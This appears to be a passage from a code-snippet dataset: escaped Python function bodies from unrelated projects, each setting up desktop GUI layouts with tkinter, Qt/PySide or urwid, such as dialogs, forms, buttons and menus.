,\r\n returned_value = \"Day\",\r\n text = \"Day\",\r\n enable = True,\r\n default_state = True,\r\n #width = 30,\r\n row = 15,\r\n column = 1,\r\n align = tk.W,\r\n command = self.day_change)\r\n\r\n self.r_Night = self.get_radio_button(\r\n self.top,\r\n control_variable =self.r_Day_Night_variable ,\r\n returned_value = \"Night\",\r\n text = \"Night\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 16,\r\n column = 1,\r\n align = tk.W,\r\n command = self.day_change)\r\n\r\n self.c_auto_zip_variable = tk.IntVar(self.top,0)\r\n\r\n self.c_auto_zip = tk.Checkbutton(\r\n self.top,\r\n text = \"Auto Zip\",\r\n variable = self.c_auto_zip_variable)\r\n self.c_auto_zip.grid(row = 17,column = 0, sticky = tk.W)\r\n self.c_auto_zip.deselect()\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 18,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n\r\n self.l_image = self.get_label(\r\n self.top,\r\n text = None,\r\n width = None, # in characters\r\n height = None, # in lines\r\n font = None,\r\n stick = None,\r\n row = 114,\r\n column = 3,#0,\r\n return_lbl = True,\r\n ctr_var = None\r\n )\r\n\r\n self.get_label(\r\n self.top,\r\n text = \"Progress :\",\r\n width = None, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 113,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n\r\n self.progress_var = tk.StringVar(self.top)\r\n \r\n self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = 40, # in characters\r\n height = 2, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 113,\r\n column = 1,\r\n return_lbl = False,\r\n ctr_var = self.progress_var\r\n )\r\n \"\"\"\r\n self.lab = self.get_label(\r\n self.top,\r\n text = \"\",\r\n width = 40, # in characters\r\n height = 1, # in lines\r\n font = None,\r\n stick = tk.W,\r\n row = 10,\r\n column = 1,\r\n return_lbl = True,\r\n #ctr_var = self.progress_var\r\n )\"\"\"\r\n\r\n self.b_start = self.get_button(\r\n root = self.top,\r\n button_text = \"Start\",\r\n row = 5,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.start_collecting\r\n )\r\n\r\n self.b_pause = self.get_button(\r\n root = self.top,\r\n button_text = \"Zip Folder\",\r\n row = 6,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.zip_folder\r\n )\r\n\r\n self.b_stop = self.get_button(\r\n root = self.top,\r\n button_text = \"Stop\",\r\n row = 7,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.stop_collecting\r\n )\r\n\r\n self.b_red = self.get_button(\r\n root = self.top,\r\n button_text = \"Red\",\r\n row = 10,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.red\r\n )\r\n self.b_red.config(bg='red',activebackground = 'red')\r\n\r\n self.b_yellow = self.get_button(\r\n root = self.top,\r\n button_text = \"Yellow\",\r\n row = 11,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.yellow\r\n )\r\n self.b_yellow.config(bg='yellow', activebackground = 'yellow')\r\n\r\n self.b_green = self.get_button(\r\n root = self.top,\r\n button_text = \"Green\",\r\n row = 12,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.green\r\n )\r\n self.b_green.config(bg='green', activebackground = 'green')\r\n\r\n self.b_normal = self.get_button(\r\n root = self.top,\r\n button_text = \"No light\",\r\n row = 13,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.normal\r\n )\r\n\r\n self.b_load_orientation = self.get_button(\r\n root = self.top,\r\n button_text = \"Load Orientation\",\r\n row = 15,\r\n column = 2,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.load_orientation\r\n )\r\n\r\n \r\n\r\n \"\"\"\r\n self.get_label(\r\n self.top,\r\n text = \"tesing\",\r\n width = 10, # in characters\r\n height = 2, # in lines\r\n font = ('Times', '12', 'normal'),\r\n row = 0,\r\n column = 0,\r\n return_lbl = False\r\n )\r\n \r\n self.button1 = self.get_button(\r\n root = self.top,\r\n button_text = \"test\",\r\n row = 1,\r\n column = 3,\r\n enable = True,\r\n width = 10,\r\n height =1,\r\n command = self.pt\r\n )\r\n\r\n self.entry = self.get_entry(\r\n self.top,\r\n default_txt = \"Test\",\r\n enable = True,\r\n width = 30,\r\n row = 3,\r\n column = 0)\r\n\r\n self.contrl = tk.IntVar(self.top)\r\n self.radio = self.get_radio_button(\r\n self.top,\r\n control_variable =self.contrl ,\r\n returned_value = 5,\r\n text = \"radio\",\r\n enable = True,\r\n default_state = False,\r\n #width = 30,\r\n row = 0,\r\n column = 0,\r\n align = tk.W,\r\n command = self.pt)\r\n\r\n self.radio2 = self.get_radio_button(\r\n self.top,\r\n control_variable =self.contrl ,\r\n returned_value = 6,\r\n text = \"radio2\",\r\n enable = True,\r\n default_state = False,\r\n width = None,\r\n row = 1,\r\n column = 0,\r\n align = tk.W,\r\n command = self.pt)\"\"\"", "def _do_layout(self):\n return", "def _setup_ui(self):\n from functools import partial\n\n self.setStyleSheet(\n \"\"\"\n QLabel[labelField=\"true\"] {\n font-weight: bold;\n }\n \"\"\"\n )\n\n # The main layout\n self.main_layout = QtWidgets.QVBoxLayout(self)\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n\n # the form layout\n self.form_layout = QtWidgets.QFormLayout()\n self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n\n # store roles\n label_role = QtWidgets.QFormLayout.LabelRole\n field_role = QtWidgets.QFormLayout.FieldRole\n\n self.main_layout.addLayout(self.form_layout)\n\n i = -1\n\n # Reviewer\n i += 1\n reviewer_name_label = QtWidgets.QLabel(self)\n reviewer_name_label.setText(\"Reviewer\")\n self.form_layout.setWidget(i, label_role, reviewer_name_label)\n\n self.reviewer_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.reviewer_name_widget)\n\n # Task Name field\n i += 1\n task_name_label = QtWidgets.QLabel(self)\n task_name_label.setText(\"Task\")\n self.form_layout.setWidget(i, label_role, task_name_label)\n\n self.task_name_widget = QtWidgets.QLabel(self)\n self.form_layout.setWidget(i, field_role, self.task_name_widget)\n\n # # Version Info field\n # from anima.ui.widgets.version import VersionDetailsWidget\n # self.latest_version_widget = VersionDetailsWidget(parent=self)\n # self.main_layout.insertWidget(0, self.latest_version_widget)\n\n # Review Type Field\n i += 1\n review_type_label = QtWidgets.QLabel(self)\n review_type_label.setText(\"Review Type\")\n self.form_layout.setWidget(i, label_role, review_type_label)\n\n self.review_type_widget = ReviewTypeWidget(self)\n self.review_type_widget.currentIndexChanged.connect(\n partial(self.review_type_changed_callback)\n )\n\n self.form_layout.setWidget(i, field_role, self.review_type_widget)\n\n # Timing Field\n i += 1\n effort_label = QtWidgets.QLabel(self)\n effort_label.setText(\"Timing\")\n self.form_layout.setWidget(i, label_role, effort_label)\n\n effort_layout = QtWidgets.QHBoxLayout()\n self.form_layout.setLayout(i, field_role, effort_layout)\n\n from anima.ui.widgets.timing import ScheduleTimingWidget\n from anima import defaults\n\n self.timing_widget = ScheduleTimingWidget(\n self, timing_resolution=defaults.timing_resolution\n )\n self.timing_widget.setEnabled(False)\n # set the default to 1 hour\n self.timing_widget.set_schedule_info(timing=1, unit=\"h\")\n effort_layout.addWidget(self.timing_widget)\n\n # Description Field\n i += 1\n description_label = QtWidgets.QLabel(self)\n description_label.setText(\"Description\")\n self.form_layout.setWidget(i, label_role, description_label)\n\n self.description_widget = QtWidgets.QTextEdit(self)\n self.form_layout.setWidget(i, field_role, self.description_widget)", "def initUI(self):\n language_help = _('''<h4>Language code.</h4>\n<p>This will be transmitted as part of the requst sent to the\nsites. As some sites only support one language, this is also used to\ndecide where to send the requests. Use a standard language code\nhere. Using invalid values or codes of unsupported languages will\nresult in no downloads. Do <em>not</em> use domain codes (E.g. use\n<code>zh</code> rather than <code>cn</code> for Chinese.)</p>''')\n self.setWindowTitle(_('Anki – Download audio'))\n self.setWindowIcon(QIcon(\":/icons/anki.png\"))\n layout = QVBoxLayout()\n self.setLayout(layout)\n edit_word_head = QLabel()\n kanji_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n<p>In the split edit fields, set the kanji on the left, the\nkana on the right.</p>\n''')\n base_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n<p>In split edit fields, set the expression (base) on the left, the\nreading (ruby) on the right.</p>\n''')\n single_et = _('''\\\n<h4>Requests to send to the download sites</h4>\n''')\n # Now decide which help text to show.\n # First, decide if we have any split fields.\n if any(f_data.split for f_data in self.field_data_list):\n if self.language_code and self.language_code.startswith('ja'):\n # Japanese\n edit_word_head.setText(kanji_et)\n else:\n # Chinese should not happen at the moment\n edit_word_head.setText(base_et)\n else:\n edit_word_head.setText(single_et)\n layout.addWidget(edit_word_head)\n self.create_data_rows(layout)\n line = QFrame(self)\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n layout.addWidget(line)\n lcode_head = QLabel(_('''<h4>Language code</h4>'''))\n layout.addWidget(lcode_head)\n lang_hlayout = QHBoxLayout()\n lc_label = QLabel(_('Language code:'), self)\n lang_hlayout.addWidget(lc_label)\n lc_label.setToolTip(language_help)\n self.language_code_lineedit = QLineEdit(self)\n try:\n self.language_code_lineedit.setText(self.language_code)\n except:\n self.language_code_lineedit.setText(default_audio_language_code)\n lang_hlayout.addWidget(self.language_code_lineedit)\n self.language_code_lineedit.setToolTip(language_help)\n layout.addLayout(lang_hlayout)\n dialog_buttons = QDialogButtonBox(self)\n dialog_buttons.addButton(QDialogButtonBox.Cancel)\n dialog_buttons.addButton(QDialogButtonBox.Ok)\n dialog_buttons.accepted.connect(self.accept)\n dialog_buttons.rejected.connect(self.reject)\n layout.addWidget(dialog_buttons)", "def initUI(self):\n self.logger.debug('Setting up the Measurement GUI')\n self.setWindowTitle(self.title)\n\n self.show()\n\n self.make_combobox_scanner()\n self.make_combobox_movements()\n self.make_combobox_configurate()\n self.make_combobox_basic()", "def show(self):\n pass", "def __init__(self: object) -> None:\n super().__init__()\n self.title(\"dnazip\")\n self.configure(bg='#ebebeb')\n self.create_main()\n self.create_menu()\n self.create_buttons()\n self.file = None", "def _build(self):", "def _build(self):", "def _setup_ui(self):\n self.resize(750, 180)\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n\n # Dialog Label\n self.dialog_label = QtWidgets.QLabel(self)\n self.dialog_label.setText(\"%s Filename Template\" % self.mode)\n self.dialog_label.setStyleSheet(\"color: rgb(71, 143, 202);font: 18pt;\")\n self.vertical_layout.addWidget(self.dialog_label)\n\n # Title Line\n line = QtWidgets.QFrame(self)\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.vertical_layout.addWidget(line)\n\n # Form Layout\n self.form_layout = QtWidgets.QFormLayout()\n self.form_layout.setLabelAlignment(\n QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing | QtCore.Qt.AlignVCenter\n )\n self.vertical_layout.addLayout(self.form_layout)\n\n # ------------------------------------------------\n # Target Entity Type Field\n\n # label\n self.target_entity_type_label = QtWidgets.QLabel(\"Target Entity Type\", self)\n self.form_layout.setWidget(\n 0, QtWidgets.QFormLayout.LabelRole, self.target_entity_type_label\n )\n\n # field\n self.target_entity_type_combo_box = QtWidgets.QComboBox(self)\n self.form_layout.setWidget(\n 0, QtWidgets.QFormLayout.FieldRole, self.target_entity_type_combo_box\n )\n\n # ------------------------------------------------\n # Name Field\n self.name_label = QtWidgets.QLabel(\"Name\", self)\n self.form_layout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.name_label)\n self.name_fields_vertical_layout = QtWidgets.QVBoxLayout()\n self.name_validator_label = QtWidgets.QLabel(self)\n self.name_validator_label.setStyleSheet(\"color: rgb(255, 0, 0);\")\n\n from anima.ui.widgets import ValidatedLineEdit\n\n self.name_line_edit = ValidatedLineEdit(\n self, message_field=self.name_validator_label\n )\n\n self.name_fields_vertical_layout.addWidget(self.name_line_edit)\n self.name_fields_vertical_layout.addWidget(self.name_validator_label)\n self.form_layout.setLayout(\n 1, QtWidgets.QFormLayout.FieldRole, self.name_fields_vertical_layout\n )\n\n # ------------------------------------------------\n # Path Code Field\n self.path_label = QtWidgets.QLabel(\"Path\", self)\n self.form_layout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.path_label)\n\n self.path_line_edit = QtWidgets.QLineEdit(self)\n # set the default value to something useful\n self.form_layout.setWidget(\n 2, QtWidgets.QFormLayout.FieldRole, self.path_line_edit\n )\n\n # ------------------------------------------------\n # Filename Code Field\n self.filename_label = QtWidgets.QLabel(\"Filename\", self)\n self.form_layout.setWidget(\n 3, QtWidgets.QFormLayout.LabelRole, self.filename_label\n )\n\n self.filename_line_edit = QtWidgets.QLineEdit(self)\n self.form_layout.setWidget(\n 3, QtWidgets.QFormLayout.FieldRole, self.filename_line_edit\n )\n\n # ------------------------------------------------\n # Button Box\n self.button_box = QtWidgets.QDialogButtonBox(self)\n self.button_box.setOrientation(QtCore.Qt.Horizontal)\n self.button_box.setStandardButtons(\n QtWidgets.QDialogButtonBox.Cancel | QtWidgets.QDialogButtonBox.Ok\n )\n self.vertical_layout.addWidget(self.button_box)\n self.vertical_layout.setStretch(2, 1)\n\n # ------------------------------------------------\n # Default values\n self.target_entity_type_combo_box.addItems(\n [\"Task\", \"Asset\", \"Shot\", \"Sequence\"]\n )\n self.name_line_edit.set_invalid() # Empty field is not valid\n self.path_line_edit.setText(\n \"$REPO{{project.repository.code}}/{{project.code}}/\"\n \"{%- for parent_task in parent_tasks -%}{{parent_task.nice_name}}\"\n \"/{%- endfor -%}\"\n )\n self.filename_line_edit.setText(\n '{{version.nice_name}}_v{{\"%03d\"|format(version.version_number)}}'\n )\n\n # ------------------------------------------------\n # Disable Fields\n if self.mode == \"Update\":\n self.target_entity_type_combo_box.setEnabled(False)\n\n # ------------------------------------------------\n # Signals\n # Name\n QtCore.QObject.connect(\n self.name_line_edit,\n QtCore.SIGNAL(\"textChanged(QString)\"),\n self.name_line_edit_changed,\n )\n\n # Button box\n QtCore.QObject.connect(\n self.button_box, QtCore.SIGNAL(\"accepted()\"), self.accept\n )\n QtCore.QObject.connect(\n self.button_box, QtCore.SIGNAL(\"rejected()\"), self.reject\n )", "def main(self):\r\n pass", "def widget(self, request, group):", "def _init_ui(self):\n self.setWindowTitle(\"HB Havens: resultaten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)\n\n self.setLayout(QtWidgets.QVBoxLayout())\n\n # Create figure\n self.figure = Figure(figsize=(4,4))\n self.ax = self.figure.add_subplot()\n\n self.ax.grid()\n self.ax.spines['right'].set_visible(False)\n self.ax.spines['top'].set_visible(False)\n self.ax.tick_params(axis='y', color='0.75')\n self.ax.tick_params(axis='x', color='0.75')\n self.ax.set_aspect(1)\n\n # Add canvas\n self.canvas = FigureCanvasQTAgg(self.figure)\n\n # this is the Navigation widget\n # it takes the Canvas widget and a parent\n self.layout().addWidget(self.canvas)\n\n # Add location selection\n hbox = QtWidgets.QHBoxLayout()\n label = QtWidgets.QLabel('Locatie:')\n label.setFixedWidth(80)\n hbox.addWidget(label)\n self.location_combobox = QtWidgets.QComboBox()\n self.location_combobox.addItems(self.result_locations)\n self.location_combobox.setCurrentIndex(self.locid)\n self.location_combobox.currentIndexChanged.connect(self._set_location)\n hbox.addWidget(self.location_combobox)\n self.layout().addLayout(hbox)\n\n # Add parameter selection\n hbox = QtWidgets.QHBoxLayout()\n label = QtWidgets.QLabel('Parameter:')\n label.setFixedWidth(80)\n hbox.addWidget(label)\n self.parameter_combobox = QtWidgets.QComboBox()\n self.input_parameters = self.modelunctab.mainmodel.hydraulic_loads.result_columns[:]\n self.parameter_combobox.addItems(self.input_parameters)\n self.parameter_combobox.currentIndexChanged.connect(self._set_parameter)\n self.parameter_combobox.setCurrentIndex(0)\n self._set_parameter()\n self.figure.tight_layout()\n hbox.addWidget(self.parameter_combobox)\n self.layout().addLayout(hbox)\n\n # Line\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n self.layout().addWidget(line)\n\n # Add ok/close\n self.closebutton = QtWidgets.QPushButton('Sluiten')\n self.closebutton.clicked.connect(self.close)\n self.layout().addWidget(self.closebutton, 0, QtCore.Qt.AlignRight)\n\n self.layout().setSizeConstraint(QtWidgets.QLayout.SetFixedSize)", "def place_main_gui(self):\n cont = self.container\n\n self.title = ttk.Label(cont, text='Detaliile contului')\n self.title.config(font=tkg.title_font())\n self.title.grid(row=0, column=0, sticky='w', pady=(30, 0))\n\n self.label1 = ttk.Label(cont, text='Nume cont')\n self.label1.config(font=tkg.regular_font())\n self.label1.grid(row=1, column=0, sticky='w', padx=5, pady=(30, 0))\n\n self.name_entry = ttk.Entry(cont)\n self.name_entry.config(font=tkg.regular_font())\n self.name_entry.grid(row=2, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.name_entry.grid(padx=(0, 10))\n\n self.label2 = ttk.Label(cont, text='Email')\n self.label2.config(font=tkg.regular_font())\n self.label2.grid(row=3, column=0, sticky='w', padx=5, pady=(10, 0))\n\n self.email_entry = ttk.Entry(cont)\n self.email_entry.config(font=tkg.regular_font())\n self.email_entry.grid(row=4, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.email_entry.grid(padx=(0, 10))\n\n self.label3 = ttk.Label(cont, text='Nume de utilizator')\n self.label3.config(font=tkg.regular_font())\n self.label3.grid(row=5, column=0, sticky='w', padx=5, pady=(10, 0))\n\n self.user_entry = ttk.Entry(cont)\n self.user_entry.config(font=tkg.regular_font())\n self.user_entry.grid(row=6, column=0, sticky='ew', pady=(5, 0))\n if platform.system() != 'Windows':\n self.user_entry.grid(padx=(0, 10))\n\n self.label4 = ttk.Label(cont, text='Parolă')\n self.label4.config(font=tkg.regular_font())\n self.label4.grid(row=7, column=0, sticky='w', padx=5, pady=(10, 0))\n\n pass_cont = ttk.Frame(cont)\n pass_cont.grid(row=8, column=0, sticky='ew')\n\n self.pass_entry = ttk.Entry(pass_cont, show='*', width=27)\n self.pass_entry.config(font=tkg.regular_font())\n self.pass_entry.grid(row=0, column=0, padx=(0, 10), pady=(5, 0))\n\n self.hide_button = hidebutton.HideButton(pass_cont, self.pass_entry)\n self.hide_button.grid(row=0, column=1, padx=(0, 10), pady=(5, 0))\n\n self.clip_button = clipbutton.ClipButton(pass_cont, self.pass_entry)\n self.clip_button.grid(row=0, column=2, pady=(5, 0))\n\n self.error_label = tk.Label(cont, text='')\n self.error_label.config(font=tkg.small_regular_font(), fg='red')\n self.error_label.grid(row=9, column=0, pady=(10, 10))", "def initUI(self):\n centralwidget = QtWidgets.QWidget()\n self.setCentralWidget(centralwidget)\n\n person_table = PersonTable(self)\n person_table.embed(self.sql)\n\n # Box Layout to organize our GUI\n lay = QtWidgets.QVBoxLayout(centralwidget)\n lay.addWidget(person_table)\n self.setGeometry(0, 0, person_table.width() + 20, person_table.height() + 20)\n self.person_table = person_table\n self.show()", "def build_ui(self):\n self.ui = UI_procstep.Ui_Form()#.Ui_USGSContactInfoWidgetMain()\n self.ui.setupUi(self)\n self.setup_dragdrop(self)\n\n self.proc_step = RepeatingElement(which='tab',\n tab_label='Step', add_text='Additional Step',\n widget=ProcessStep, remove_text='Remove Step', italic_text='Processing Steps Taken')\n\n #self.proc_step = RepeatingElement(params=params, which='tab', tab_label='Source',)\n self.proc_step.add_another()\n self.ui.widget_procstep.layout().addWidget(self.proc_step)", "def _init_display(self):\n raise NotImplementedError", "def build_UI(self):\n\n #Common local coordinates to change the UI positions\n common_x = 0\n common_y = 5\n\n #Create the Main Title\n self.titleFont = font.Font(family = FONTS[\"lucida grande\"], size = 30)\n self.title = cGUIf.get_TextLabel(self,\n \"File Converter App \",\n self.titleFont,\n 135 + common_x,\n 40 + common_y)\n\n #Add the \"Main Icon\"\n self.mainIcon = cGUIf.get_ImgLabel(self,\n self.__pics[\"main_icon\"],\n 280 + common_x,\n 125 + common_y)\n\n\n #Create a subtitle that says \"options\"\n self.subtitleFont = font.Font(family = FONTS[\"courier new\"], size = 22)\n self.subtitle = cGUIf.get_TextLabel(self,\n \"Options\",\n self.subtitleFont,\n 240 + common_x,\n 195 + common_y)\n\n #Create a label that says \"Image Conversion\"\n self.conversionFont = font.Font(family = FONTS[\"times new roman\"], size = 15)\n self.imageConversionLabel = cGUIf.get_TextLabel(self,\n \" Image\\n Conversion\",\n self.conversionFont,\n 60 + common_x,\n 285 + common_y)\n\n #Create a button for Image Conversion\n self.imageButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"image_frame\"),\n 190 + common_x,\n 270 + common_y)\n self.imageButton.configure(image = self.__pics[\"image_icon\"])\n\n #Create a label that says \"Audio Conversion\"\n self.audioConversionLabel = cGUIf.get_TextLabel(self,\n \" Audio\\n Conversion\",\n self.conversionFont,\n 440 + common_x,\n 285 + common_y)\n\n #Create a button for Audio Conversion\n self.audioButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"audio_frame\"),\n 340 + common_x,\n 270 + common_y)\n self.audioButton.configure(image = self.__pics[\"audio_icon\"])\n\n #Create a label that says \"Doc Conversion\"\n self.docConversionLabel = cGUIf.get_TextLabel(self,\n \" Doc\\n Conversion\",\n self.conversionFont,\n 60 + common_x,\n 410 + common_y)\n\n\n #Create a button for Doc Conversion\n self.docButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"doc_frame\"),\n 190 + common_x,\n 400 + common_y)\n self.docButton.configure(image = self.__pics[\"doc_icon\"])\n\n\n #Create a label that says \"Video Conversion\"\n self.videoConversionLabel = cGUIf.get_TextLabel(self,\n \" Video\\n Conversion\",\n self.conversionFont,\n 440 + common_x,\n 410 + common_y)\n\n #Create a button for Video Conversion\n self.videoButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"video_frame\"),\n 340 + common_x,\n 400 + common_y)\n self.videoButton.configure(image = self.__pics[\"video_icon\"])", "def toControls(self,widget):", "def __init__(self):\n self.view = GuiView(self)\n return", "def init_UI(self):\n # widgets\n self.modeComboBox = QtWidgets.QComboBox()\n self.updateBtn = QtWidgets.QPushButton('Force Update')\n self.pauseBtn = QtWidgets.QPushButton()\n self.pauseBtn.setCheckable(True)\n\n self.clearBtn = QtWidgets.QPushButton()\n self.clearBtn.setIcon(QtGui.QIcon(IconPaths.ICON_CLEAR_FILES))\n self.filterBtn = QtWidgets.QToolButton()\n self.filterBtn.setIcon(QtGui.QIcon(IconPaths.ICON_FILTER))\n self.filterBtn.setMinimumWidth(35)\n self.filterBtn.setStyleSheet('QToolButton::menu-indicator {subcontrol-position: center right; height: 7px}')\n self.filterBtn.setPopupMode(QtWidgets.QToolButton.InstantPopup)\n self.prefBtn = QtWidgets.QToolButton()\n self.prefBtn.setIcon(QtGui.QIcon(IconPaths.ICON_SETTINGS))\n #self.pBar = QtWidgets.QProgressBar()\n self.itemView = LocalizeView()\n self.itemView.setModel(self.proxy_model)\n self.autoScrollCB = QtWidgets.QCheckBox('Auto scroll to localizing files')\n self.autoScrollCB.setChecked(True)\n\n # tweak sizes so the widgets all line up vertically with Nuke's style\n self.modeComboBox.setMinimumHeight(self.updateBtn.sizeHint().height())\n self.pauseBtn.setMaximumSize(self.updateBtn.sizeHint())\n self.clearBtn.setMaximumSize(self.updateBtn.sizeHint())\n\n # mode menu\n self.modeLabel = QtWidgets.QLabel('Mode')\n self.modeComboBox.addItems(['On', 'Manual', 'Off'])\n\n # update menu\n self.updateMenu = QtWidgets.QMenu()\n self.act_forceUpdateAll = QtWidgets.QAction('All', self)\n self.act_forceUpdateSelectedNodes = QtWidgets.QAction('Selected', self)\n self.act_forceUpdateOnDemand = QtWidgets.QAction('On demand only', self) \n self.updateMenu.addAction(self.act_forceUpdateAll)\n self.updateMenu.addAction(self.act_forceUpdateSelectedNodes)\n self.updateMenu.addAction(self.act_forceUpdateOnDemand)\n self.updateBtn.setMenu(self.updateMenu)\n\n # clear menu\n self.clearMenu = QtWidgets.QMenu()\n self.clearMenu.addAction(QtWidgets.QAction('All local files', self, triggered=self.__delete_all_local_files))\n self.clearMenu.addAction(QtWidgets.QAction('Unused local files', self, triggered=_open_delete_dialog))\n self.clearBtn.setMenu(self.clearMenu)\n\n # filter menu\n self.filterMenu = QtWidgets.QMenu(self.filterBtn)\n self.act_filter_all = QtWidgets.QAction('All', self.filterMenu, checkable=True)\n self.act_filter_in_progress = QtWidgets.QAction('In Progress', self.filterMenu, checkable=True)\n self.act_filter_up_to_date = QtWidgets.QAction('Up to date', self.filterMenu, checkable=True)\n self.act_filter_out_of_date = QtWidgets.QAction('Out of date', self.filterMenu, checkable=True)\n self.act_filter_from_source = QtWidgets.QAction('Reading from source', self.filterMenu, checkable=True)\n self.act_filter_disabled = QtWidgets.QAction('Disabled', self.filterMenu, checkable=True)\n self.act_filter_not_localized = QtWidgets.QAction('Not Localized', self.filterMenu, checkable=True)\n\n self.act_filter_in_progress.setData(Status.IN_PROGRESS)\n self.act_filter_up_to_date.setData(Status.UP_TO_DATE)\n self.act_filter_out_of_date.setData(Status.OUT_OF_DATE)\n self.act_filter_from_source.setData(Status.READ_FROM_SOURCE)\n self.act_filter_disabled.setData(Status.DISABLED)\n self.act_filter_not_localized.setData(Status.NOT_LOCALIZED)\n for act in (self.act_filter_all, self.act_filter_in_progress, self.act_filter_up_to_date, self.act_filter_out_of_date,\n self.act_filter_from_source, self.act_filter_disabled, self.act_filter_not_localized):\n self.filterMenu.addAction(act)\n self.filterBtn.setMenu(self.filterMenu)\n\n # tooltips\n self.modeComboBox.setToolTip('Sets the global localization mode.\\nThis is the same as using the options in the Cache/Localization/Mode menu.')\n self.updateBtn.setToolTip('Forces the update of localized files.\\nThis is the same as using the options in the Cache/Localization/Force Update menu.')\n self.pauseBtn.setToolTip('Pauses/Resumes file localization.\\nThis is the same as Cache/Localization/Pause.')\n self.clearBtn.setToolTip('''Allows for clearing localized files.\\nTwo modes are supported:\n \"All local files\" - this will delete all files in {}\n \"Unused local files\" - this will only delete unused local files (same as Cache/Localization/Clear Unused Local Files)'''.format(nuke.toNode('preferences')['localCachePath'].evaluate()))\n self.filterBtn.setToolTip('Sets a view filter the table.')\n self.prefBtn.setToolTip('Open the preferences.')\n\n # layouts\n layout = QtWidgets.QVBoxLayout()\n btnLayout = QtWidgets.QHBoxLayout()\n btnLayout.addWidget(self.modeLabel)\n btnLayout.addWidget(self.modeComboBox)\n btnLayout.addWidget(self.updateBtn)\n btnLayout.addWidget(self.pauseBtn)\n btnLayout.addWidget(self.clearBtn)\n btnLayout.addStretch()\n btnLayout.addWidget(self.filterBtn)\n btnLayout.addWidget(self.prefBtn)\n layout.addLayout(btnLayout)\n #layout.addWidget(self.pBar)\n layout.addWidget(self.itemView)\n layout.addWidget(self.autoScrollCB)\n layout.setAlignment(self.autoScrollCB, QtCore.Qt.AlignRight)\n self.setLayout(layout)", "def ui_setup(self):\n loader = QUiLoader()\n file = QFile('./user_interface/form/main_window.ui')\n file.open(QFile.ReadOnly)\n self._window = loader.load(file)\n file.close()\n\n status_bar = QStatusBar(self._window)\n status_bar.showMessage(__copyright__)\n self._window.setStatusBar(status_bar)\n self._window.setWindowIcon(QIcon('./user_interface/media/bucketing_icon.jpeg'))\n self._window.setWindowTitle('PySide2 Project - Basic UI Framework')\n\n self._option_panel = OptionPanel()\n self._option_panel.add_button('DekBan', './user_interface/media/dekban.png')\n self._option_panel.add_button('Charlie', './user_interface/media/charlie.jpeg')\n self._option_panel.add_button('Simon', './user_interface/media/Simon.jpeg')\n\n # Add widget to main layout\n main_layout = self._window.main_layout\n main_layout.itemAtPosition(0, 0).setAlignment(QtCore.Qt.AlignCenter)\n main_layout.itemAtPosition(0, 1).setAlignment(QtCore.Qt.AlignVCenter)\n main_layout.addWidget(self._option_panel, 2, 0, 1, 1)\n\n # Add page widget to stack\n self._pages['item'] = ItemWidget()\n self._pages['text1'] = TextPage(text=PAUSE_TEXT)\n self._pages['text2'] = TextPage(text=STOP_TEXT)\n\n for index, name in enumerate(self._pages):\n print('pages {} : {} page'.format(index, name))\n self._window.widget_stack.addWidget(self._pages[name].widget)\n\n self._window.widget_stack.setCurrentIndex(0)\n\n # Build up signal / slot\n self._option_panel.currentItemChanged.connect(self.set_page)", "def __init__(self):\n\t\tself.walltime_edit = urwid.Edit( ('editcp',\"walltime=\"), \"200:00:00\" )\n\t\tself.nodes_edit = urwid.IntEdit( ('editcp', \"nodes=\"), 0 )\n\t\tself.myri_ppn_edit = urwid.IntEdit( ('editcp', \"myri:ppn=\"), 4)\n\t\tself.workdir_edit = urwid.Edit( (\"editcp\", \"WORKDIR(-d) \"), '~/qjob_output')\n\t\tself.runtime_output_checkbox = urwid.CheckBox(\"See output while running\")\n\t\tself.other_options_edit = urwid.Edit( (\"editcp\", \"others:\"), '-q cmb -j oe -S /bin/bash')\n\t\tself.source_bash_profile_checkbox = urwid.CheckBox(\"source ~/.bash_profile\")\n\t\tself.source_bash_profile_checkbox.set_state(True)\n\t\tself.just_write_down_checkbox = urwid.CheckBox(\"Write jobfile. No submission.\")\n\t\tself.jobname_prefix_edit = urwid.Edit( (\"editcp\", \"jobname_prefix:\"), 